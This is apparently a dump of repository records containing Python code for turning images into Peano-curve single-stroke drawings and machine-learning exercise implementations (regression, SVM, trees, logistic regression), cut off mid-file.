serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Content {\n pub id: String,\n pub articles: Vec<Article>,\n pub videos: Vec<Video>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Article {\n pub headline: String,\n pub url: String,\n pub summary: String,\n pub updated_at: String,\n pub thumbnail: Thumbnail,\n #[serde(rename = \"updatedAtISO\")]\n pub updated_at_iso: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Thumbnail {\n pub base_url: String,\n pub orig_width: i64,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Video {\n pub headline: String,\n pub url: String,\n pub summary: String,\n pub updated_at: String,\n pub thumbnail: Thumbnail2,\n #[serde(rename = \"updatedAtISO\")]\n pub updated_at_iso: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Thumbnail2 {\n pub base_url: String,\n}\n" } ]
55
tannakaken/peanocurvestroke
https://github.com/tannakaken/peanocurvestroke
5eb8c462ab4640d49b47faa020e16dfd10181c90
1ff5d0cccfa6b555948554eb6408c01c27feb818
d85f790a7f73be56b4489b52da607df841b37896
refs/heads/master
2020-05-27T08:25:09.777723
2019-05-26T15:05:13
2019-05-26T15:05:13
188,544,814
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 31, "blob_id": "97c92ca93154ae8a0f66c818569c504cab62c856", "content_id": "cd18cf01805046e513a79c8d3fcf09fe0b217e30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32, "license_type": "permissive", "max_line_length": 31, "num_lines": 1, "path": "/pixelization/__init__.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "from pixelization.main import *\n" }, { "alpha_fraction": 0.5718231797218323, "alphanum_fraction": 0.5939226746559143, "avg_line_length": 20.294116973876953, "blob_id": "cc9ae69eff06b65ad3211a728bd48d0e4ade0c8d", "content_id": "7018f72cd91d244122bb982999048687b4d97069", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 936, "license_type": "permissive", "max_line_length": 76, "num_lines": 34, "path": "/pixelization/main.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom PIL import Image\nimport numpy as np\n\ndef pixelization(filename):\n \"\"\"画像ファイルを開いて\n 画像をモノクロ化し、\n 縮小し、\n 色の濃さを8段階に量子化して返す。\n\n Parameters\n ----------\n filename : str\n 画像ファイル名\n\n Returns\n -------\n arr : numpy.ndarray\n モノクロ化され縮小された画像のピクセルの色の濃さを8段階(0〜7)で表現したnumpy二重配列\n \"\"\"\n im = Image.open(filename)\n monochrome_im = im.convert('L') # モノクロ化\n small_im = monochrome_im.resize((49,49)) # 縮小\n\n arr = np.array(small_im)\n arr = 7 - (arr / (256/8)) # ピクセルの濃さを8段階に量子化\n arr = arr.astype(np.uint8)\n\n return arr\n\nif __name__ == '__main__':\n import os.path\n arr = pixelization(os.path.dirname(__file__) + '/../Giuseppe_Peano.jpg')\n print(arr)\n" }, { "alpha_fraction": 0.4667276442050934, "alphanum_fraction": 0.4827349781990051, "avg_line_length": 26.331249237060547, "blob_id": "9836edeb75baeff90e3704a9928109575a360517", "content_id": "3b5187d00eead475a65d6e32b2307b1c1a9528e5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5327, "license_type": "permissive", "max_line_length": 90, "num_lines": 160, "path": "/peano/main.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom PIL import Image,ImageDraw\nimport sys\n\nclass Peano:\n \"\"\"\n ペアノ曲線の構成法による一筆書きを行うための画像データと\n ペンの現在位置を保持するクラス\n \"\"\"\n def __init__(self, width, height):\n \"\"\"\n 画像データを幅と高さで初期化して、\n ペンの位置を画面左上の原点に置く。\n\n Parameters\n ----------\n width : int\n 画像の幅\n height : int\n 画像の高さ\n \"\"\"\n self.image = Image.new('RGB', (width, height), (255,255,255))\n self.drawing = ImageDraw.Draw(self.image)\n self.x = 0\n self.y = 0\n\n def show(self):\n \"\"\"\n 現在の画像の状態をGUIで表示する。\n \"\"\"\n self.image.show()\n\n def save(self, filename):\n \"\"\"\n 現在の画像データをファイルに保存する。\n\n Parameters\n ----------\n filename : str\n 画像を保存するファイル名\n \"\"\"\n self.image.save(filename)\n\n def goto(self, x,y):\n \"\"\"\n ペンを移動させながら線を引く。\n\n Parameters\n ----------\n x : int\n 移動先のx座標\n y : int\n 移動先のy座標\n \"\"\"\n self.drawing.line((self.x, self.y, x, y), fill=(0,0,0), width=1)\n self.x = x\n self.y = y\n \n def unit(self, x, y, width, height):\n \"\"\"\n ペアノ曲線の一番単純な1つ分の曲線(単位ペアノと呼ぶことにする)を描く。\n\n Parameters\n ----------\n x : int\n 単位ペアノを描く長方形の左上のx座標\n y : int\n 単位ペアノを描く長方形の左上のy座標\n width : int\n 単位ペアノを描く長方形の幅\n height : int\n 単位ペアノを描く長方形の高さ\n \"\"\"\n self.goto(x + width/6, y + height/6)\n self.goto(x + width*5/6, y + height/6)\n self.goto(x + width*5/6, y + height/2)\n self.goto(x + width/6, y + height/2)\n self.goto(x + width/6, y + height*5/6)\n self.goto(x + width*5/6, y + height*5/6)\n\n def stroke(self, x, y, width, height, depth):\n \"\"\"\n ピクセルを3x3分割して\n 再帰的にペアノ曲線を描いていく。\n\n Parameters\n ----------\n x : int\n ペアノ曲線を描く長方形の左上のx座標\n y : int\n ペアノ曲線を描く長方形の左上のy座標\n width : int\n ペアノ曲線を描く長方形の幅\n height : int\n ペアノ曲線を描く長方形の高さ\n depth : int\n 0〜7で表現された色の濃さ。(正確には対応しないが)再帰の深さ\n \"\"\"\n if depth <= 0:\n self.unit(x, y, width, height)\n else:\n new_width = width/3\n new_height = height/3\n if depth % 3 == 0:\n odd_depth = depth - 2\n even_depth = depth - 5\n elif depth % 3 == 1:\n odd_depth = depth - 3\n even_depth = depth - 3\n else:\n odd_depth = depth - 4\n even_depth = depth - 1\n self.stroke(x, y, new_width, new_height, odd_depth)\n self.stroke(x+new_width, y+new_height, new_width, -new_height, even_depth)\n self.stroke(x+2*new_width, y, new_width, new_height, odd_depth)\n self.stroke(x+width, y+new_height, -new_width, new_height, even_depth)\n self.stroke(x+2*new_width, y+2*new_height, -new_width, -new_height, odd_depth)\n self.stroke(x+new_width, y+new_height, -new_width, new_height, even_depth)\n self.stroke(x, y+2*new_height, new_width, new_height, odd_depth)\n self.stroke(x+new_width, y+height, new_width, -new_height, even_depth)\n self.stroke(x+2*new_width, y+2*new_height, new_width, new_height, odd_depth)\n\n def stroke_array(self, width, height, data):\n \"\"\"\n 二重配列dataの内容に沿って、\n ペアノ曲線による一筆描き(ペアノ一筆書きと呼ぶことにする)で、\n 画像に線を描いていく。\n\n Parameters\n ----------\n width : int\n ペアノ一筆描きする領域の幅\n height : int\n ペアノ一筆描きする領域の高さ\n data : nump: numpy.ndarray\n 画像のピクセルの色の濃さを8段階(0〜7)で表したnumpy二重配列\n \"\"\"\n rows, columns = data.shape\n x = 0\n y = 0\n wunit = width/columns\n hunit = height/rows\n for row in data:\n if (wunit < 0):\n row = row[::-1]\n for column in row:\n self.stroke(x, y, wunit, hunit, column)\n x += wunit\n y += hunit\n hunit = -hunit\n wunit = -wunit\n hunit = -hunit\n\nif __name__ == '__main__':\n size = 270\n peano = Peano(size,size)\n depth = int(sys.argv[1])\n peano.stroke(0,0,size,size,depth)\n peano.show()\n peano.save(\"peano\" + str(depth) + \".png\")\n" }, { "alpha_fraction": 0.6994949579238892, "alphanum_fraction": 0.7146464586257935, "avg_line_length": 25.399999618530273, "blob_id": "c9094abf81fdd05d8c859e22fb4792a2e8cc8254", "content_id": "bc2c998967f93eea67482501edbb6ec29adae2dc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "permissive", "max_line_length": 53, "num_lines": 15, "path": "/main.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom pixelization import pixelization\nfrom peano import Peano\nimport sys\nimport os.path\n\nfor filename in sys.argv[1:]:\n data = pixelization(filename)\n size = 8100\n peano = Peano(size,size)\n peano.stroke_array(size, size, data)\n withoutext, _ = os.path.splitext(filename)\n output_filename = withoutext + \"_peanocurved.png\"\n peano.save(output_filename)\n" }, { "alpha_fraction": 0.8389534950256348, "alphanum_fraction": 0.854651153087616, "avg_line_length": 20.234567642211914, "blob_id": "dc3b7e0bd3ff5f05432c8e99fc6436c2008adaa8", "content_id": "d3f3e1cede5f5fd34d5becb207946841859c015b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4201, "license_type": "permissive", "max_line_length": 130, "num_lines": 81, "path": "/README.md", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "# ペアノ曲線による一筆書き\n\n## 理論的背景\n\nペアノ曲線とは、平面を充填する曲線の一種である。\n詳しくはWikipediaの[該当ページ](https://ja.wikipedia.org/wiki/%E3%83%9A%E3%82%A2%E3%83%8E%E6%9B%B2%E7%B7%9A)\nを読んでいただければわかるであろう。\n\nさて、ペアノ曲線は手で描ける曲線の極限として定義される。\nこのような抽象的な議論に慣れていない方もいるかもしれないが、\n現代数学においてこのような構成法に出会ったとき、\n多くの場合「この手法によって任意の精度が実現できる」\nというように読み替えられることが多い。\n\n例えば、点列の極限についてこう読み替えれば、通常のN-δ論法になる。\n\nただしこの読み替えは必ずしも簡単ではない。\n実際、ペアノ曲線の主張を正確にこう読み替えるのは難しい。\nこの難しさの理由は、ペアノ曲線の定義が、\n「空間は大きさのない点の集合として成り立っている」という点集合論\nに依拠しており、\n実はこれがそんなに理解のしやすいものではないということによると思われる。\n\n点から空間を構成する古代ギリシャ以来の方法は「逆立ちしたやり方」であり、\nむしろ点は「だんだん小さくなる領域の極限」として解釈すべきものなのではないか、\nという見方は、例えば中世スコラ哲学においてもみられる。\n\n現代数学において「pointless topology」などのジャンルでは、\n点を基礎概念としない幾何が追求されている。\n\nしかしペアノ曲線の非数学者でも扱いやすい読み替えを考えるのに、\nそのような最先端の数学が必要となっては本末転倒だ。\n\nそこで多少情報が落ちてもいい読み替えを探るように方針を転換する。\nそうすれば、ペアノ曲線の構成法は、\n「この手法によって、任意の長さ以上の一筆書きを正方形内部に収めることができる」\nと読み替えることが可能なのだ。\n\n点集合としての曲線や平面では、どこまで行っても曲線で埋められた平面の面積は0で、\n極限において初めて0ではなくなってしまう。\nしかし、現実世界の曲線においては、これは正方形の中にしめる黒の面積の割合がどんどん\n大きくなっていることになる。\n\nつまりペアノ曲線の理論を応用すれば、一筆書きによって任意の濃さのピクセルを表現することができるのだ。\n\n今回は、これを応用して、任意の画像を一筆書きによって描く簡単なスクリプトを書いてみた。\n\n## 仕組み\n\nまず画像がカラーなら白黒にし、\nそのピクセルの濃さを8段階に量子化する。\n\nその濃さに合わせて、ペアノ曲線の構成法で線を描き、\nピクセル同士を繋いでいく。\n\nコード自体は簡単なので、読めばわかると思う。\n\nこれは相当に単純な方法で行なっているので、\n工夫すればもっといい方法が見つかるかもしれない。\n\n## 動作例\n\nサンプル画像のジョゼッぺ・ペアノの肖像(パブリックドメイン)\n\n<img src=\"https://raw.githubusercontent.com/tannakaken/peanocurvestroke/master/Giuseppe_Peano.jpg\" width=\"500\">\n\nを、このスクリプトの入力にすると、\n\n`python main.py Gioseppe_Peano.jpg`\n\n次の画像が生まれる。\n\n<img src=\"https://raw.githubusercontent.com/tannakaken/peanocurvestroke/master/Giuseppe_Peano_peanocurved.sample.png\" width=\"500\">\n\n一筆書きになっている様子は上の画像をクリックして拡大してみればわかるであろう。\n\nただし、作りが雑なために、正方形にリサイズしてから処理を行っているため、\nアスペクト比が狂って少し横長になっている。\n\nまあ、こんな処理で汎用ツールを作るのも馬鹿らしいので、\n気になるようなら、前処理をするなり、コードを書き直すなりしてほしい。\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 24, "blob_id": "cefa7a9dff3c243c7b5336a1bcd65189f361d498", "content_id": "3fb1bc9e12a65a0da06e5c2a47e98abbeb3b89a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25, "license_type": "permissive", "max_line_length": 24, "num_lines": 1, "path": "/peano/__init__.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "from peano.main import *\n" } ]
6
pthaike/mlia
https://github.com/pthaike/mlia
4635a41daa42ab5ffc34eee88a4598521c891153
0e59ffd485eb207e8f04c4c0d03ded022f586909
e6bf00ea995684579601d9b95f4522798491d919
refs/heads/master
2021-01-10T04:46:03.820140
2017-07-18T14:49:27
2017-07-18T14:49:27
46,259,213
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6398147940635681, "alphanum_fraction": 0.6537036895751953, "avg_line_length": 23, "blob_id": "9edad5ded55341560f10e247050c1712d3aa13af", "content_id": "ece471c299449deb5465b6338482259827e0de92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1080, "license_type": "no_license", "max_line_length": 57, "num_lines": 45, "path": "/regression/ridgeReg.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#!/bin/python\nfrom numpy import *\n\ndef loadDataSet(fileName):\n\tnumFeat = len(open(fileName).readline().split('\\t')) - 1\n\tdataMat = []; labelMat = []\n\tfr = open(fileName)\n\tfor line in fr.readlines():\n\t\tlineArr =[]\n\t\tcurLine = line.strip().split('\\t')\n\t\tfor i in range(numFeat):\n\t\t\tlineArr.append(float(curLine[i]))\n\t\tdataMat.append(lineArr)\n\t\tlabelMat.append(float(curLine[-1]))\n\treturn dataMat,labelMat\n\n\n\ndef ridgeRegres(xMat, yMat, lamda=0.2):\n\tdemon = xMat.T * xMat - lamda * eye(shape(xMat)[1])\n\tif linalg.det(demon) == 0.0:\n\t\tprint \"This matrix is singular, cannot do inverse\"\n\t\treturn\n\tw = demon.I * xMat.T * yMat\n\treturn w\n\ndef testRidge(xArr, yArr):\n\txMat = mat(xArr)\n\tyMat = mat(yArr).T\n\tymean = mean(yMat, 0)\n\tyMat = yMat - ymean\n\txMean = mean(xMat, 0)\n\txVar = var(xMat, 0)\n\txMat = (xMat - xMean) / xVar\n\tnumTest = 30\n\twMat = zeros((numTest, shape(xMean)[1]))\n\tfor i in range(numTest):\n\t\tw = ridgeRegres(xMat, yMat, exp(i-10))\n\t\twMat[i,:] = w.T\n\treturn wMat\n\n\nif __name__ == '__main__':\n\tdataMat,labelMat = loadDataSet('abalone.txt')\n\tprint testRidge(dataMat,labelMat )\n" }, { "alpha_fraction": 0.5140025615692139, "alphanum_fraction": 0.5312365293502808, "avg_line_length": 23.17708396911621, "blob_id": "3880cdef58e171d97dbbbf2b4523b038fe56ba1c", "content_id": "7d5bc6a2bb6026a28e7efd4bd88f769d8e5eaac0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2321, "license_type": "no_license", "max_line_length": 125, "num_lines": 96, "path": "/svm/svm_simple.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#! /bin/python\n\nfrom numpy import *\n\n\"\"\"\nload dataSet\n\"\"\"\ndef loadDataSet():\n\tfr = open(\"testSet.txt\")\n\tx = []\n\ty = []\n\tfor line in fr.readlines():\n\t\tls = line.split(\"\\t\")\n\t\tx.append([float(ls[0]), float(ls[1])])\n\t\ty.append(float(ls[2]))\n\treturn x, y\n\n\ndef selectJrand(i, m):\n\tj = i\n\twhile j==i:\n\t\tj = random.uniform(0,m)\n\treturn j\n\n\"\"\"\nselect alpha between L and H\n\"\"\"\ndef clipAlpha(aj, H, L):\n\tif aj > H:\n\t\taj = H\n\tif aj < L:\n\t\taj = L\n\treturn aj\n\n\ndef kernel(x, xi):\n\treturn x * xi.T\n\n\ndef smoSimple(x, y, C, toler, maxIter):\n\tx = mat(x)\n\ty = mat(y).transpose()\n\tb = 0\n\tm,n = shape(x)\n\talphas = mat(zeros((m,1)))\n\titer = 0\n\twhile iter < maxIter:\n\t\talphaChange = 0\n\t\tfor i in range(m):\n\t\t\tf_xi = float(multiply(alphas, y).T * kernel(x, x[i,:])) + b\n\t\t\tEi = f_xi - float(y[i])\n\t\t\tif y[i] * f_xi < toler and alphas[i] < C or\\\n\t\t\ty[i] * f_xi > toler and alphas[i] > 0:\n\t\t\t\tj = selectJrand(i, m)\n\t\t\t\tf_xj = float(multiply(alphas, y).T * kernel(x, x[j,:])) + b\n\t\t\t\tEj = f_xj - y[j]\n\t\t\t\talpha_i_old = alphas[i].copy()\n\t\t\t\talpha_j_old = alphas[j].copy()\n\t\t\t\tif y[i] == y[j]:\n\t\t\t\t\tL = max(0, alpha_i_old+ alpha_j_old - C)\n\t\t\t\t\tH = min(C, alpha_i_old + alpha_j_old)\n\t\t\t\telse:\n\t\t\t\t\tL = max(0, alpha_j_old - alpha_i_old)\n\t\t\t\t\tH = min(C + alpha_j_old - alpha_i_old)\n\t\t\t\tif L==H:\n\t\t\t\t\tprint \"L==H\"\n\t\t\t\t\tcontinue\n\t\t\t\teta = kernel(x[i], x[i]) + kernel(x[j], x[j]) - 2 * kernel(x[i], x[j])\n\t\t\t\talphas[j] += y[i] * (Ei - Ej)\n\t\t\t\talphas[j] = clipAlpha(alphas[j], H, L)\n\t\t\t\tif alphas[j] - alpha_j_old < 0.00001:\n\t\t\t\t\tprint \"j not moving enough\"\n\t\t\t\t\tcontinue\n\t\t\t\talphas[i] = alpha_i_old + y[i] * y[j] * (alpha_j_old - alphas[j])\n\t\t\t\tb1 = b - Ei - y[i] * kernel(x[i], x[i]) * (alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[i])*(alphas[j] - alpha_j_old)\n\t\t\t\tb2 = b - Ej - y[i] * kernel(x[i], x[j]) * (alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[j])*(alphas[j] - alpha_j_old)\n\t\t\t\tif alphas[i] > 0 and alphas[i] < C:\n\t\t\t\t\tb = b1\n\t\t\t\telif alphas[j] > 0 and alphas[j] < C:\n\t\t\t\t\tb = b2\n\t\t\t\telse:\n\t\t\t\t\tb = (b1 + b2) / 2.0\n\t\t\t\talphaChange += 1\n\t\t\t\tprint \"iter: %d i:%d, pairs changed %d\" % (iter, i, alphaChange)\n\t\tif alphaChange == 0:\n\t\t\titer += 1\n\t\telse:\n\t\t\titer = 0\n\t\tprint \"iteration number: %d\" % iter\n\treturn alphas, b\n\nif __name__ == '__main__':\n\tx,y = loadDataSet()\n\talphas, b = smoSimple(x,y,0.6,0.001,40)\n\t# print alphas\n\tprint b\n" }, { "alpha_fraction": 0.6340078115463257, "alphanum_fraction": 0.6514021754264832, "avg_line_length": 27.593908309936523, "blob_id": "4655756f4fac14f391771f07f3671802edf81e38", "content_id": "ad3be2a7df6de38cc159ee8814f0f05fa80ec55c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5634, "license_type": "no_license", "max_line_length": 101, "num_lines": 197, "path": "/tree regression/regTree.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#!/bin/python\n\nfrom numpy import *\nimport pdb\n\ndef loadDataSet(file):\n\tdataMat = []\n\tfr = open(file)\n\tfor line in fr.readlines():\n\t\tcurline = line.strip().split(\"\\t\")\n\t\tfloatline = map(float, curline)\n\t\tdataMat.append(floatline)\n\treturn dataMat\n\ndef binSplitDataSet(dataSet, feature, value):\n\tmat0 = dataSet[nonzero(dataSet[:, feature] > value)[0], :][0]\n\tmat1 = dataSet[nonzero(dataSet[:, feature] <= value)[0], :][0]\n\treturn mat0, mat1\n\ndef regLeaf(dataSet):\n\treturn mean(dataSet[:, -1])\n\ndef regErr(dataSet):\n\treturn var(dataSet[:, -1]) * shape(dataSet)[0]\n\ndef createTree(dataSet, leafType= regLeaf, errType=regErr, ops=(1,4)):\n\tfeature, val = chooseBestSplit(dataSet, leafType, errType, ops)\n\tif feature == None:\n\t\treturn val\n\tretTree = {}\n\tretTree[\"feat\"] = feature\n\tretTree[\"val\"] = val\n\tleft, right = binSplitDataSet(dataSet, feature, val)\n\tretTree[\"left\"] = createTree(left, leafType, errType, ops)\n\tretTree[\"right\"] = createTree(right, leafType, errType, ops)\n\treturn retTree\n\n\n\n\n\"\"\"\nops(a, b)-- a:limit the minimal error b:limit the number of leaf\n\"\"\"\ndef chooseBestSplit(dataSet, leafType=regLeaf, errType=regErr, ops=(1,4)):\n\tif len(set(dataSet[:, -1].T.tolist()[0])) == 1: # when there is a only one entry\n\t\treturn None, leafType(dataSet)\n\tm,n = shape(dataSet)\n\tErr = regErr(dataSet)\n\tbestFeat = 0\n\tbestVal = 0\n\tbestE = inf\n\tfor feat in range(n-1):\n\t\tfor val in set(dataSet[:, feat]):\n\t\t\tmat0, mat1 = binSplitDataSet(dataSet, feat, val)\n\t\t\tif(shape(mat0)[0] < ops[1] or shape(mat1)[0] < ops[1]): # limit the number of leaf\n\t\t\t\tcontinue\n\t\t\tnewE = regErr(mat0) + regErr(mat1)\n\t\t\tif newE < bestE:\n\t\t\t\tbestE = newE\n\t\t\t\tbestFeat = feat\n\t\t\t\tbestVal = val\n\tif Err - bestE < ops[0]:\n\t\treturn None, leafType(dataSet)\n\tmat0, mat1 = binSplitDataSet(dataSet, bestFeat, bestVal)\n\tif(shape(mat0)[0] < ops[1] or shape(mat1)[0] < ops[1]): # limit the number of leaf\n\t\treturn None, leafType(dataSet)\n\treturn bestFeat, bestVal\n\ndef isTree(obj):\n\treturn (type(obj).__name__ == 'dict')\n\n\ndef getMean(tree):\n\tif isTree(tree['right']) : tree['right'] = getMean(tree['right'])\n\tif isTree(tree['left']) : tree['left'] = getMean(tree['left'])\n\treturn (tree['left'] + tree['right']) / 2.0\n\n\"\"\"\nSME to verify the cost of no merge and merge\n\"\"\"\n\ndef prune(tree, testData):\n\tif shape(testData)[0] == 0: return getMean(tree)\n\tif isTree(tree['left']) or isTree(tree['right']):\n\t\tleft, right = binSplitDataSet(testData, tree['feat'], tree['val'])\n\tif isTree(tree['left']):\n\t\ttree['left'] = prune(tree['left'], left)\n\tif isTree(tree['right']):\n\t\ttree['right'] = prune(tree['right'], right)\n\tif not isTree(tree['left']) and not isTree(tree['right']):\n\t\tleft, right = binSplitDataSet(testData, tree['feat'], tree['val'])\n\t\terrBefore = sum(power(left[:, -1] - tree['left'], 2)) + sum(power(right[:, -1] - tree['right'], 2))\n\t\ttreeMean = tree['left'] + tree['right']\n\t\terrMerge = sum(power(testData[:, -1] - treeMean, 2))\n\t\tif errMerge < errBefore:\n\t\t\tprint \"merged\"\n\t\t\treturn treeMean\n\t\telse:\n\t\t\treturn tree\n\telse:\n\t\treturn tree\n\n\n\"\"\"\nmodel tree \n\"\"\"\ndef linearSolve(dataSet):\n\tm, n = shape(dataSet)\n\tX = mat(ones((m,n))); Y = mat(ones((m,1)))\n\tX[:, 1:n] = mat(dataSet[:, 0:n-1])\n\tY = dataSet[:, -1]\n\txtx = X.T * X\n\tif linalg.det(xtx) == 0.0:\n\t\traise NameError('This matrix is singular, cannot do inverse,\\n\\\n\t\ttry increasing the second value of ops')\n\tws = xtx.I * (X.T * Y)\n\t# pdb.set_trace()\n\treturn ws, X, Y\n\n\n\n# def linearSolve(dataSet): #helper function used in two places\n# m,n = shape(dataSet)\n# X = mat(ones((m,n))); Y = mat(ones((m,1)))#create a copy of data with 1 in 0th postion\n# X[:,1:n] = dataSet[:,0:n-1]; Y = dataSet[:,-1]#and strip out Y\n# xTx = X.T*X\n# if linalg.det(xTx) == 0.0:\n# raise NameError('This matrix is singular, cannot do inverse,\\n\\\n# try increasing the second value of ops')\n# ws = xTx.I * (X.T * Y)\n# pdb.set_trace()\n# return ws,X,Y\n\n\ndef modelLeaf(dataSet):\n\tws, X, Y = linearSolve(dataSet)\n\treturn ws\n\ndef modelErr(dataSet):\n\tws, X, Y = linearSolve(dataSet)\n\treturn sum(power(X.ws - Y, 2))\n\n\ndef regTreeVal(model, data):\n\treturn float(model)\n\ndef modelTreeVal(model, data):\n\tn = shape(data)[1]\n\tx = mat(ones((1, n+1)))\n\tx[:, 1:n+1] = data\n\t# pdb.set_trace()\n\treturn float(x * model)\n\ndef treeForecast(tree, data, modelEval = regTreeVal):\n\tif not isTree(tree): return modelEval(tree, data)\n\tif data[tree['feat']] > tree['val']:\n\t\treturn treeForecast(tree['left'], data, modelEval)\n\telse:\n\t\treturn treeForecast(tree['right'], data, modelEval)\n\ndef createForecast(tree, testData, modelEval = regTreeVal):\n\tm = len(testData)\n\tpre = zeros((m, 1))\n\t# pdb.set_trace()\n\tfor i in range(m):\n\t\tpre[i,0] = treeForecast(tree, mat(testData[i]), modelEval)\n\treturn pre\n\n\nif __name__ == '__main__':\n\t# dataSet = loadDataSet('ex2.txt')\n\t# dataSet = mat(dataSet)\n\t# tree = createTree(dataSet, ops=(0,1))\n\t# print tree\n\t# testData = loadDataSet('ex2test.txt')\n\t# testData = mat(testData)\n\t# prunetree = prune(tree, testData)\n\t# print prunetree\n\n\t# dataSet = loadDataSet('exp2.txt')\n\t# dataSet = mat(dataSet)\n\t# tree = createTree(dataSet, modelLeaf, linearErr, ops=(1,10))\n\t# print tree\n\n\ttrainSet = loadDataSet('bikeSpeedVsIq_train.txt')\n\ttrainSet = mat(trainSet)\n\ttestSet = loadDataSet('bikeSpeedVsIq_train.txt')\n\ttestSet = mat(testSet)\n\ttree = createTree(trainSet, ops=(1,20))\n\tpre = createForecast(tree, testSet[:,0])\n\t# print pre\n\tprint \"tree:\", corrcoef(pre, testSet[:,1],rowvar=0)[0,1]\n\n\ttree = createTree(trainSet, modelLeaf, modelErr, ops=(1,20))\n\tpre = createForecast(tree, testSet[:,0], modelTreeVal)\n\t# print pre\n\tprint \"model tree\", corrcoef(pre, testSet[:,1],rowvar=0)[0,1]\n\n" }, { "alpha_fraction": 0.5876598954200745, "alphanum_fraction": 0.6102332472801208, "avg_line_length": 19.461538314819336, "blob_id": "a6ef66465514846edae1f82d8c23b171e7c01781", "content_id": "2e3d55c12bec4dd7429c236f09965b11ef60de4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1329, "license_type": "no_license", "max_line_length": 79, "num_lines": 65, "path": "/logistic/logRegres.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#! /bin/python\n\nfrom numpy import *\n\ndef sigmoid(x):\n\treturn 1.0/(1+exp(-x))\n\n\n\"\"\"\nupdate function w = w + alpha * grad = w + alpha * (y - sigmod(wx))*x\n\"\"\"\ndef gradAscent(x, y):\n\tm, n = shape(x)\n\talpha = 0.001\n\tmaxCycles = 500\n\tw = ones((n,1))\n\tfor i in range(maxCycles):\n\t\tw = w + alpha * x.transpose()*(y - sigmoid(x*w))\n\treturn w\n\n\n\"\"\"\nupdate weight with a single instance\n\"\"\"\ndef stocGradAscent0(x, y):\n\tm, n = shape(x)\n\talpha = 0.01\n\tw = ones(n)\n\tfor i in range(m):\n\t\tw = w + alpha * (y[i] - sigmoid(sum(x[i]*w))) * x[i]\n\treturn w\n\n\"\"\"\nimprove with random index and study ratio alpha\n\"\"\"\ndef stocGradAscent(x, y, numIter = 150):\n\tm,n = shape(x)\n\tw = ones(n)\n\tfor i in range(numIter):\n\t\tdataIndex = range(m)\n\t\tfor j in range(m):\n\t\t\talpha = 4 / (1.0 + j + i) + 0.01\n\t\t\trandIndex = int(random.uniform(0, len(dataIndex)))\n\t\t\tw = w + alpha * (y[randIndex] - sigmoid(sum(x[randIndex]*w))) * x[randIndex]\n\t\t\tdel(dataIndex[randIndex])\n\treturn w\n\n\n\n# load data\ndef loadDataSet():\n\tdataMat = []\n\tlabelMat = []\n\tfr = open(\"testSet.txt\")\n\tfor line in fr.readlines():\n\t\tls = line.strip().split(\"\\t\")\n\t\tdataMat.append([1.0, float(ls[0]), float(ls[1])])\n\t\tlabelMat.append(int(ls[2]))\n\treturn dataMat, labelMat\n\n\nif __name__ == '__main__':\n\tdat, label = loadDataSet()\n\t#print gradAscent(dat, label)\n\tprint stocGradAscent(array(dat), label)" }, { "alpha_fraction": 0.6610057353973389, "alphanum_fraction": 0.676885724067688, "avg_line_length": 29.233333587646484, "blob_id": "31036f6384ab5e89f5842cb6ce897ac04566e195", "content_id": "8bd1c1deff856b596f624c7250858e5e5a6a4981", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4534, "license_type": "no_license", "max_line_length": 162, "num_lines": 150, "path": "/nn/nn.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "# !/bin/python\n\nimport random\nfrom numpy import *\nimport math\nimport pdb\n\n\nclass NeuronNetwork:\n\tdef __init__(self, num_inputs, num_hidden, num_outputs, rate = 0.5,\n\t\thidden_layer_weights = None, hidden_layer_bias = None,\n\t\toutput_layer_weights = None, output_layer_bias = None):\n\n\t\tself.num_inputs = num_inputs\n\t\tself.rate = rate\n\t\tself.hidden_layer = NueronLayer(num_hidden, hidden_layer_bias)\n\t\tself.output_layer = NueronLayer(num_outputs, 